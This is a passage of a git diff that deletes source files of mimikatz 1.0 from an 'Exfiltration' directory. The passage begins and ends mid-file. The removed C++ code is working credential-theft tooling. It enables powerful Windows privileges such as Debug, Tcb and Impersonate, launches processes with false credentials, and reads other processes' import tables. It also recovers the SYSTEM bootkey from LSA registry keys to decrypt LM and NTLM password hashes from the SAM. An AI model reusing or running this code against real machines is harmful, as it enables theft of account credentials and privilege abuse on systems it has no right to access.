monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(security, L"security", L"Demande (ou désactive) le privilège Security")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(tcb, L"tcb", L"Demande (ou désactive) le privilège Tcb")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(impersonate, L"impersonate", L"Demande (ou désactive) le privilège Impersonate")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(assign, L"assign", L"Demande (ou désactive) le privilège AssignPrimaryToken")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(shutdown, L"shutdown", L"Demande (ou désactive) le privilège Shutdown")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(takeowner, L"takeowner", L"Demande (ou désactive) le privilège TakeOwnership")); - return monVector; -} - -bool mod_mimikatz_privilege::enable(vector<wstring> * arguments) -{ - bool reussite = multiplePrivs(arguments, SE_PRIVILEGE_ENABLED); - return true; -} - -bool mod_mimikatz_privilege::remove(vector<wstring> * arguments) -{ - bool reussite = multiplePrivs(arguments, SE_PRIVILEGE_REMOVED); - return true; -} - -bool mod_mimikatz_privilege::disable(vector<wstring> * arguments) -{ - bool reussite = multiplePrivs(arguments, 0); - return true; -} - -bool mod_mimikatz_privilege::simplePriv(wstring priv, vector<wstring> * arguments) -{ - bool ajout = arguments->empty(); - - (*outputStream) << L"Demande d" << (ajout ? L"\'ACTIVATION" : L"e RETRAIT") << L" du privilège : " << priv << L" : "; - - vector<pair<wstring, DWORD>> * mesPrivs = new vector<pair<wstring, DWORD>>; - mesPrivs->push_back(make_pair(priv, ajout ? SE_PRIVILEGE_ENABLED : 0)); - - bool reussite = mod_privilege::set(mesPrivs);//, INVALID_HANDLE_VALUE); - delete mesPrivs; - - if(reussite) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - - return reussite; -} - -bool mod_mimikatz_privilege::multiplePrivs(vector<wstring> * privs, DWORD type) -{ - bool reussite = false; - vector<pair<wstring, DWORD>> * mesPrivs = new vector<pair<wstring, DWORD>>; - for(vector<wstring>::iterator monPrivilege = privs->begin(); monPrivilege != privs->end() ; monPrivilege++) - { - mesPrivs->push_back(make_pair(*monPrivilege, type)); - } - reussite = mod_privilege::set(mesPrivs); - delete mesPrivs; - - if(reussite) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - - return reussite; -} - - -bool mod_mimikatz_privilege::list(vector<wstring> * arguments) -{ - vector<pair<wstring, DWORD>> * mesPrivs = new vector<pair<wstring, DWORD>>; - - if(mod_privilege::get(mesPrivs))//, INVALID_HANDLE_VALUE)) - { - for(vector<pair<wstring, DWORD>>::iterator monPrivilege = mesPrivs->begin(); (monPrivilege != mesPrivs->end()) ; monPrivilege++) - { - (*outputStream) << setw(35) << setfill(wchar_t(L' ')) << left << monPrivilege->first << right << L'\t'; - - if(monPrivilege->second & SE_PRIVILEGE_VALID_ATTRIBUTES) - { - if(monPrivilege->second & SE_PRIVILEGE_ENABLED_BY_DEFAULT) - { - (*outputStream) << L"ENABLED_BY_DEFAULT "; - } - - if(monPrivilege->second & SE_PRIVILEGE_ENABLED) - { - (*outputStream) << L"ENABLED "; - } - - if(monPrivilege->second & SE_PRIVILEGE_REMOVED) - { - (*outputStream) << L"REMOVED "; - } - - if(monPrivilege->second & SE_PRIVILEGE_USED_FOR_ACCESS) - { - (*outputStream) << L"USED_FOR_ACCESS "; - } - - if(monPrivilege->second & SE_PRIVILEGE_REMOVED) - { - (*outputStream) << L"REMOVED"; - } - } - - (*outputStream) << endl; - } - } - else (*outputStream) << mod_system::getWinError() << endl; - - return true; -} - - -bool mod_mimikatz_privilege::debug(vector<wstring> * arguments) -{ - simplePriv(SE_DEBUG_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::security(vector<wstring> * arguments) -{ - simplePriv(SE_SECURITY_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::tcb(vector<wstring> * arguments) -{ - simplePriv(SE_TCB_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::impersonate(vector<wstring> * arguments) -{ - simplePriv(SE_IMPERSONATE_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::assign(vector<wstring> * arguments) -{ - simplePriv(SE_ASSIGNPRIMARYTOKEN_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::shutdown(vector<wstring> * arguments) -{ - simplePriv(SE_SHUTDOWN_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::takeowner(vector<wstring> * arguments) -{ - simplePriv(SE_TAKE_OWNERSHIP_NAME, arguments); return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.h deleted file mode 100644 index f3dc739..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.h +++ /dev/null @@ -1,33 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_privilege.h" -#include <iostream> - -class mod_mimikatz_privilege -{ -private: - static bool multiplePrivs(vector<wstring> * privs, DWORD type); - static bool simplePriv(wstring priv, vector<wstring> * arguments); -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - static bool enable(vector<wstring> * arguments); - static bool remove(vector<wstring> * arguments); - static bool disable(vector<wstring> * arguments); - - static bool debug(vector<wstring> * arguments); - static bool security(vector<wstring> * arguments); - static bool tcb(vector<wstring> * arguments); - static bool impersonate(vector<wstring> * arguments); - static bool assign(vector<wstring> * arguments); - static bool shutdown(vector<wstring> * arguments); - static bool takeowner(vector<wstring> * arguments); - -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.cpp deleted file mode 100644 index d18ca8b..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.cpp +++ /dev/null @@ -1,298 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_process.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_process::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(start, L"start", L"Exécute un processus, /paused et/ou /sudo")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(suspend, L"suspend", L"Suspend l\'exécution d\'un processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(resume, L"resume", L"Reprend un processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(stop, L"stop", L"Stoppe un (ou plusieurs) processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(modules, L"modules", L"Liste les modules (pour le moment du PID courant)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(iat, L"iat", L"Liste la table d\'adressage")); - return monVector; -} - -bool mod_mimikatz_process::start(vector<wstring> * arguments) -{ - if(!arguments->empty()) - { - wstring commande = arguments->back(); - bool paused = false; - bool sudo = false; - - (*outputStream) << L"Demande d\'exécution de : \'" << commande << L"'" << endl; - PROCESS_INFORMATION pi = {INVALID_HANDLE_VALUE, INVALID_HANDLE_VALUE, 0, 0}; - - switch(arguments->size()) - { - case 2: - if(_wcsicmp(arguments->front().c_str(), L"/paused") == 0) - paused = true; - else if(_wcsicmp(arguments->front().c_str(), L"/sudo") == 0) - sudo = true; - else - goto doStartProcess_syntaxerror; - - break; - case 3: - if(_wcsicmp(arguments->front().c_str(), L"/paused") == 0) - paused = true; - else - goto doStartProcess_syntaxerror; - - if(_wcsicmp(arguments->at(1).c_str(), L"/sudo") == 0) - sudo = true; - else - goto doStartProcess_syntaxerror; - - break; - } - - if(mod_process::start(&commande, &pi, paused, sudo)) - { - if(paused) - (*outputStream) << L" * Le Thread principal est suspendu ! Reprise avec : thread::resume " << pi.dwThreadId << endl; - - if(sudo) - (*outputStream) << L" * Le processus est démarré avec de fausses données d\'identification" << endl; - - printInfosFromPid(pi.dwProcessId, pi.dwThreadId); - } - else (*outputStream) << L"mod_process::start ; " << mod_system::getWinError() << endl; - } - else - { -doStartProcess_syntaxerror: - (*outputStream) << L"Erreur de syntaxe ; " << L"process::start [/paused] [/sudo] commande" << endl; - } - - return true; -} - -bool mod_mimikatz_process::stop(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monProcessName = arguments->begin(); monProcessName != arguments->end(); monProcessName++) - { - mod_process::KIWI_PROCESSENTRY32 monProcess; - wstring procName = *monProcessName; - - if(mod_process::getUniqueForName(&monProcess, &procName)) - { - (*outputStream) << L"Fin de : " << procName << L'\t'; - if(mod_process::stop(monProcess.th32ProcessID)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_process::stop ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; - } - - return true; -} - - -bool mod_mimikatz_process::suspend(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monProcessName = arguments->begin(); monProcessName != arguments->end(); monProcessName++) - { - mod_process::KIWI_PROCESSENTRY32 monProcess; - wstring procName = *monProcessName; - - if(mod_process::getUniqueForName(&monProcess, &procName)) - { - (*outputStream) << L"Suspension de : " << procName << L'\t'; - if(mod_process::suspend(monProcess.th32ProcessID)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_process::suspend ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; - } - - return true; -} - - -bool mod_mimikatz_process::resume(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monProcessName = arguments->begin(); monProcessName != arguments->end(); monProcessName++) - { - mod_process::KIWI_PROCESSENTRY32 monProcess; - wstring procName = *monProcessName; - - if(mod_process::getUniqueForName(&monProcess, &procName)) - { - (*outputStream) << L"Reprise de : " << procName << L'\t'; - if(mod_process::resume(monProcess.th32ProcessID)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_process::resume ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; - } - - return true; -} - - - - -bool mod_mimikatz_process::list(vector<wstring> * arguments) -{ - vector<mod_process::KIWI_PROCESSENTRY32> * vectorProcess = new vector<mod_process::KIWI_PROCESSENTRY32>(); - if(mod_process::getList(vectorProcess)) - { - (*outputStream) << L"PID\tPPID\t#Ths\tpri\timage" << endl; - for(vector<mod_process::KIWI_PROCESSENTRY32>::iterator monProcess = vectorProcess->begin(); monProcess != vectorProcess->end(); monProcess++) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monProcess->th32ProcessID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monProcess->th32ParentProcessID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monProcess->cntThreads << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monProcess->pcPriClassBase << L'\t' << - monProcess->szExeFile << - endl; - } - } - else (*outputStream) << L"mod_process::getList ; " << mod_system::getWinError() << endl; - - delete vectorProcess; - return true; -} - -bool mod_mimikatz_process::modules(vector<wstring> * arguments) -{ - DWORD processId = 0 ; - - if(!arguments->empty() && !(arguments->size() > 1)) - { - wstringstream monBuffer; - monBuffer << arguments->front(); - monBuffer >> processId; - } - - vector<mod_process::KIWI_MODULEENTRY32> * vectorModules = new vector<mod_process::KIWI_MODULEENTRY32>(); - if(mod_process::getModulesListForProcessId(vectorModules, &processId)) - { - (*outputStream) << L"@Base\tTaille\tModule\tPath" << endl; - for(vector<mod_process::KIWI_MODULEENTRY32>::iterator monModule = vectorModules->begin(); monModule != vectorModules->end(); monModule++) - { - (*outputStream) << monModule->modBaseAddr << L'\t' << monModule->modBaseSize << '\t' << monModule->szModule << L'\t' << monModule->szExePath << endl; - } - } - else - (*outputStream) << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl; - - delete vectorModules; - return true; -} - -bool mod_mimikatz_process::iat(vector<wstring> * arguments) -{ - wstring process; - wstring module; - - switch(arguments->size()) - { - case 2: - process = arguments->at(0); - module = arguments->at(1); - break; - case 1: - process = arguments->at(0); - break; - default: - ; - } - - mod_process::KIWI_PROCESSENTRY32 monProcess; - if(mod_process::getUniqueForName(&monProcess, &process)) - { - if(HANDLE monHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, monProcess.th32ProcessID)) - { - if(module.empty() || (module.front() != L'*')) - { - if(module.empty()) - module.assign(process); - - mod_process::KIWI_MODULEENTRY32 * monModule = new mod_process::KIWI_MODULEENTRY32(); - if(mod_process::getUniqueModuleForName(monModule, &module, &monProcess.th32ProcessID)) - { - printIATFromModule(monModule, monHandle); - } - else (*outputStream) << L"mod_process::getUniqueModuleForName ; " << mod_system::getWinError() << endl; - delete monModule; - } - else - { - vector<mod_process::KIWI_MODULEENTRY32> * vectorModules = new vector<mod_process::KIWI_MODULEENTRY32>(); - if(mod_process::getModulesListForProcessId(vectorModules, &monProcess.th32ProcessID)) - { - for(vector<mod_process::KIWI_MODULEENTRY32>::iterator monModule = vectorModules->begin(); monModule != vectorModules->end(); monModule++) - printIATFromModule(&*monModule, monHandle); - } - else (*outputStream) << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl; - - delete vectorModules; - } - - CloseHandle(monHandle); - } - } - else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; - - return true; -} - -void mod_mimikatz_process::printInfosFromPid(DWORD &PID, DWORD ThreadId) -{ - (*outputStream) << L"PID : " << PID << endl; - - if(ThreadId) - { - (*outputStream) << L"ThreadID : " << ThreadId << endl; - } - - LUID monId = {0, 0}; - if(mod_process::getAuthentificationIdFromProcessId(PID, monId)) - { - (*outputStream) << "AuthId_h : " << monId.HighPart << endl; - (*outputStream) << "AuthId_l : " << monId.LowPart << endl; - } - else (*outputStream) << L"Erreur : " << mod_system::getWinError() << endl; -} - -void mod_mimikatz_process::printIATFromModule(mod_process::KIWI_MODULEENTRY32 * monModule, HANDLE monHandle) -{ - (*outputStream) << monModule->szModule << L" -> " << monModule->szExePath << endl; - PBYTE baseAddr = reinterpret_cast<PBYTE>(monModule->modBaseAddr); - - vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>> * monIAT = new vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>>(); - if(mod_process::getIAT(baseAddr, monIAT, monHandle)) - { - for(vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>>::iterator monModuleImporte = monIAT->begin(); monModuleImporte != monIAT->end(); monModuleImporte++) - { - (*outputStream) << L" - Imports depuis : " << monModuleImporte->first.c_str() << endl; - for(vector<mod_process::KIWI_IAT_MODULE>::iterator maFonctionImporte = monModuleImporte->second.begin(); maFonctionImporte != monModuleImporte->second.end(); maFonctionImporte++) - { - (*outputStream) << L" " << maFonctionImporte->ptrToFunc << L" -> " << maFonctionImporte->ptrFunc << L' '; - if(maFonctionImporte->Ordinal != 0) - (*outputStream) << L"O# " << maFonctionImporte->Ordinal; - else - (*outputStream) << maFonctionImporte->funcName.c_str(); - (*outputStream) << endl; - } - } - } - delete monIAT; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.h deleted file mode 100644 index 68f8428..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.h +++ /dev/null @@ -1,32 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_process.h" -#include <iostream> - -class mod_mimikatz_process -{ -private: - static void printInfosFromPid(DWORD &PID, DWORD ThreadId); - static void printIATFromModule(mod_process::KIWI_MODULEENTRY32 * monModule, HANDLE monHandle = INVALID_HANDLE_VALUE); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - - static bool start(vector<wstring> * arguments); - static bool suspend(vector<wstring> * arguments); - static bool resume(vector<wstring> * arguments); - static bool stop(vector<wstring> * arguments); - - - static bool modules(vector<wstring> * arguments); - static bool iat(vector<wstring> * arguments); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.cpp deleted file mode 100644 index 26f5798..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.cpp +++ /dev/null @@ -1,353 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_samdump.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_samdump::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(full, L"hashes", L"Récupère la bootkey depuis une ruche SYSTEM puis les hashes depuis une ruche SAM")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(bootkey, L"bootkey", L"Récupère la bootkey depuis une ruche SYSTEM")); - return monVector; -} - -bool mod_mimikatz_samdump::bootkey(vector<wstring> * arguments) -{ - unsigned char bootkey[0x10]; - if(!arguments->empty()) - getInfosFromHive(arguments->front(), bootkey); - else - getInfosFromReg(bootkey); - return true; -} - -bool mod_mimikatz_samdump::full(vector<wstring> * arguments) -{ - unsigned char bootkey[0x10]; - if(!arguments->empty() && (arguments->size() >= 1 && arguments->size() <= 2)) - { - if(getInfosFromHive(arguments->front().c_str(), bootkey)) - { - if(!getUsersAndHashesFromHive(arguments->back().c_str(), bootkey)) - (*outputStream) << L"Erreur lors de l\'exploration des ruches" << endl; - } - } - else - { - if(getInfosFromReg(bootkey)) - { - if(!getUsersAndHashesFromReg(bootkey)) - (*outputStream) << L"Erreur lors de l\'exploration du registre" << endl; - } - } - return true; -} - -bool mod_mimikatz_samdump::getUsersAndHashesFromHive(wstring samHive, unsigned char bootkey[0x10]) -{ - bool reussite = false; - - mod_hive::hive * monHive = new mod_hive::hive(); - mod_hive::InitHive(monHive); - if(mod_hive::RegOpenHive(samHive.c_str(), monHive)) - { - string * rootKey = new string(); - if(mod_hive::RegGetRootKey(monHive, rootKey)) - { - string * keyAccountName = new string(*rootKey); keyAccountName->append("\\SAM\\Domains\\Account"); - string * valAccountName = new string("F"); - int longueurF = 0; unsigned char *bufferF = NULL; - - if(mod_hive::RegOpenKeyQueryValue(monHive, keyAccountName, valAccountName, &bufferF, &longueurF)) - { - BYTE hBootKey[0x20] = {0}; - if(mod_hash::getHbootKeyFromBootKeyAndF(hBootKey, bootkey, bufferF)) - { - string * keyUsers = new string(*rootKey); keyUsers->append("\\SAM\\Domains\\Account\\Users"); - mod_hive::nk_hdr * nodeUsers = new mod_hive::nk_hdr(); - if(mod_hive::RegOpenKey(monHive, keyUsers, &nodeUsers )) - { - vector<string> * keyNames = new vector<string>(); - if(reussite = mod_hive::RegEnumKey(monHive, nodeUsers, keyNames)) - { - for(vector<string>::iterator maKey = keyNames->begin(); maKey != keyNames->end(); maKey++) - { - if(maKey->compare("Names") != 0) - { - string * keyUser = new string(*keyUsers); keyUser->append("\\"); keyUser->append(*maKey); - string valUserF = "F"; mod_hash::USER_F * userF = NULL; int longueurF = 0; - string valUserV = "V"; mod_hash::USER_V * userV = NULL; int longueurV = 0; - - if(reussite &= mod_hive::RegOpenKeyQueryValue(monHive, keyUser, &valUserV, reinterpret_cast<unsigned char **>(&userV), &longueurV) && - mod_hive::RegOpenKeyQueryValue(monHive, keyUser, &valUserF, reinterpret_cast<unsigned char **>(&userF), &longueurF)) - { - infosFromUserAndKey(userF, userV, hBootKey); - delete[] userF, userV; - } - delete keyUser; - } - } - } - delete keyNames; - } - delete nodeUsers, keyUsers; - } - delete[] bufferF; - } - delete valAccountName, keyAccountName; - } - delete rootKey; - } - delete monHive; - - return reussite; -} - -bool mod_mimikatz_samdump::getInfosFromHive(wstring systemHive, unsigned char bootkey[0x10]) -{ - bool reussite = false; - - mod_hive::hive * monHive = new mod_hive::hive(); - mod_hive::InitHive(monHive); - - if(mod_hive::RegOpenHive(systemHive.c_str(), monHive)) - { - string * rootKey = new string(); - if(mod_hive::RegGetRootKey(monHive, rootKey)) - { - DWORD nControlSet = 0; - if(getNControlSetFromHive(monHive, rootKey, &nControlSet)) - { - stringstream * monControlSet = new stringstream; - *monControlSet << *rootKey << "\\ControlSet" << setw(3) << setfill('0') << nControlSet; - string * fullControlSet = new string(monControlSet->str()); - delete monControlSet; - - wstring * computerName = new wstring(); - if(getComputerNameFromHive(monHive, fullControlSet, computerName)) - (*outputStream) << L"Ordinateur : " << *computerName << endl; - delete computerName; - - if(reussite = getBootKeyFromHive(monHive, fullControlSet, bootkey)) - (*outputStream) << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl; - delete fullControlSet; - } - } - delete rootKey; - mod_hive::RegCloseHive(monHive); - } - delete monHive; - - return reussite; -} - -bool mod_mimikatz_samdump::getComputerNameFromHive(mod_hive::hive * theHive, string * fullControlSet, wstring * computerName) -{ - bool reussite = false; - - string * keyComputerName = new string(*fullControlSet); keyComputerName->append("\\Control\\ComputerName\\ComputerName"); - string * valComputerName = new string("ComputerName"); - int longueur = 0; unsigned char *buffer = NULL; - if(reussite = mod_hive::RegOpenKeyQueryValue(theHive, keyComputerName, valComputerName, &buffer, &longueur)) - { - computerName->assign(reinterpret_cast<wchar_t *>(buffer), longueur / sizeof(wchar_t)); - delete[] buffer; - } - delete valComputerName; - delete keyComputerName; - - return reussite; -} - -bool mod_mimikatz_samdump::getBootKeyFromHive(mod_hive::hive * theHive, string * fullControlSet, unsigned char bootkey[0x10]) -{ - bool reussite = false; - - unsigned char key[0x10]; - char *kn[] = {"JD", "Skew1", "GBG", "Data"}; - - for(unsigned int i = 0; i < sizeof(kn) / sizeof(char *); i++ ) - { - string * maKey = new string(*fullControlSet); maKey->append("\\Control\\Lsa\\"); maKey->append(kn[i]); - mod_hive::nk_hdr * n = new mod_hive::nk_hdr(); - - if(reussite = mod_hive::RegOpenKey(theHive, maKey, &n)) - { - char kv[9] = {0}; - unsigned char *b = mod_hive::read_data(theHive, n->classname_off + 0x1000); - for(short j = 0; j < (n->classname_len / 2) && j < 8; j++) - kv[j] = b[j*2]; - sscanf_s(kv, "%x", (unsigned int*) (&key[i*4])); - } - delete n, maKey; - } - - if(reussite) - mod_hash::getBootKeyFromKey(bootkey, key); - - return reussite; -} - -bool mod_mimikatz_samdump::getBootKeyFromReg(BYTE bootkey[0x10]) -{ - bool reussite = false; - - DWORD code; - BYTE key[0x10] = {0}; - wchar_t * kn[] = {L"JD", L"Skew1", L"GBG", L"Data"}; - HKEY monLSA; - code = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Lsa", 0, KEY_READ, &monLSA); - if(code == ERROR_SUCCESS) - { - for(unsigned int i = 0; (i < sizeof(kn) / sizeof(wchar_t *)) && (code == ERROR_SUCCESS); i++ ) - { - HKEY monSecret; - code = RegOpenKeyEx(monLSA, kn[i], 0, KEY_READ, &monSecret); - if(code == ERROR_SUCCESS) - { - wchar_t monBuffer[8 + 1]; - DWORD maTaille = 8 + 1; - - code = RegQueryInfoKey(monSecret, monBuffer, &maTaille, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); - if(code == ERROR_SUCCESS) - swscanf_s(monBuffer, L"%x", (DWORD *) (&key[i * sizeof(DWORD)])); - else (*outputStream) << L"RegQueryInfoKey " << kn[i] << " : " << mod_system::getWinError(false, code) << endl; - RegCloseKey(monSecret); - } else (*outputStream) << L"RegOpenKeyEx " << kn[i] << " : " << mod_system::getWinError(false, code) << endl; - } - RegCloseKey(monLSA); - } else (*outputStream) << L"RegOpenKeyEx LSA : " << mod_system::getWinError(false, code) << endl; - - if(reussite = (code == ERROR_SUCCESS)) - mod_hash::getBootKeyFromKey(bootkey, key); - - return reussite; -} - - - -bool mod_mimikatz_samdump::getNControlSetFromHive(mod_hive::hive * theHive, string * rootKey, DWORD * nControlSet) -{ - bool reussite = false; - - string * selectKey = new string(*rootKey); selectKey->append("\\Select"); - string * nDefault = new string("Default"); - int longueur = 0; unsigned char *buffer = NULL; - - if(mod_hive::RegOpenKeyQueryValue(theHive, selectKey, nDefault, &buffer, &longueur)) - { - if(reussite = (longueur == sizeof(DWORD))) - *nControlSet = *(DWORD *) (buffer); - delete[] buffer; - } - - delete nDefault, selectKey; - return reussite; -} - -bool mod_mimikatz_samdump::getInfosFromReg(BYTE bootkey[0x10]) -{ - bool reussite = false; - - wstring * computerName = new wstring(); - if(mod_system::getComputerName(computerName)) - (*outputStream) << L"Ordinateur : " << *computerName << endl; - delete computerName; - - if(reussite = getBootKeyFromReg(bootkey)) - (*outputStream) << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl; - - return reussite; -} - - -bool mod_mimikatz_samdump::getUsersAndHashesFromReg(BYTE bootkey[0x10]) -{ - bool reussite = false; - - DWORD code; - HKEY maSAM; - code = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SAM\\SAM\\Domains\\Account", 0, KEY_READ, &maSAM); - if(code == ERROR_SUCCESS) - { - DWORD tailleRequise = 0; - code = RegQueryValueEx(maSAM, L"F", NULL, NULL, NULL, &tailleRequise); - if(code == ERROR_SUCCESS) - { - BYTE * bufferF = new BYTE[tailleRequise]; - code = RegQueryValueEx(maSAM, L"F", NULL, NULL, bufferF, &tailleRequise); - if(code == ERROR_SUCCESS) - { - BYTE hBootKey[0x10] = {0}; - if(mod_hash::getHbootKeyFromBootKeyAndF(hBootKey, bootkey, bufferF)) - { - HKEY mesUsers; - code = RegOpenKeyEx(maSAM, L"Users", 0, KEY_READ, &mesUsers); - if(code == ERROR_SUCCESS) - { - DWORD nombreUsers = 0, tailleMaxSousCle = 0; - code = RegQueryInfoKey(mesUsers, NULL, NULL, NULL, &nombreUsers, &tailleMaxSousCle, NULL, NULL, NULL, NULL, NULL, NULL); - if(reussite = (code == ERROR_SUCCESS)) - { - tailleMaxSousCle++; - wchar_t * monRid = new wchar_t[tailleMaxSousCle]; - for(DWORD i = 0; i < nombreUsers ; i++) - { - DWORD tailleRid = tailleMaxSousCle; - code = RegEnumKeyExW(mesUsers, i, monRid, &tailleRid, NULL, NULL, NULL, NULL); - if(code == ERROR_SUCCESS) - { - if(_wcsicmp(monRid, L"Names") != 0) - { - HKEY monUser; - code = RegOpenKeyEx(mesUsers, monRid, 0, KEY_READ, &monUser); - if(reussite &= (code == ERROR_SUCCESS)) - { - DWORD tailleF = 0, tailleV = 0; - if((RegQueryValueEx(monUser, L"F", NULL, NULL, NULL, &tailleF) == ERROR_SUCCESS) && - (RegQueryValueEx(monUser, L"V", NULL, NULL, NULL, &tailleV) == ERROR_SUCCESS)) - { - mod_hash::USER_F * userF = reinterpret_cast<mod_hash::USER_F *>(new BYTE[tailleF]); - mod_hash::USER_V * userV = reinterpret_cast<mod_hash::USER_V *>(new BYTE[tailleV]); - - if((RegQueryValueEx(monUser, L"F", NULL, NULL, reinterpret_cast<BYTE *>(userF), &tailleF) == ERROR_SUCCESS) && - (RegQueryValueEx(monUser, L"V", NULL, NULL, reinterpret_cast<BYTE *>(userV), &tailleV) == ERROR_SUCCESS)) - infosFromUserAndKey(userF, userV, hBootKey); - - delete[] userF, userV; - } - RegCloseKey(monUser); - } - } - } else (*outputStream) << L"RegEnumKeyExW : " << mod_system::getWinError(false, code) << endl; - } - delete[] monRid; - } - RegCloseKey(mesUsers); - } else (*outputStream) << L"RegOpenKeyEx Users : " << mod_system::getWinError(false, code) << endl; - } - } else (*outputStream) << L"RegQueryValueEx 2 F : " << mod_system::getWinError(false, code) << endl; - delete[] bufferF; - } else (*outputStream) << L"RegQueryValueEx 1 F : " << mod_system::getWinError(false, code) << endl; - RegCloseKey(maSAM); - } else (*outputStream) << L"RegOpenKeyEx SAM : " << mod_system::getWinError(false, code) << endl; - - return reussite; -} - -void mod_mimikatz_samdump::infosFromUserAndKey(mod_hash::USER_F * userF, mod_hash::USER_V * userV, BYTE hBootKey[0x10]) -{ - wstring hashLM, hashNTLM; - mod_hash::decryptHash(&hashLM, hBootKey, userV, &userV->LM, userF->UserId, false); - mod_hash::decryptHash(&hashNTLM, hBootKey, userV, &userV->NTLM, userF->UserId, true); - - 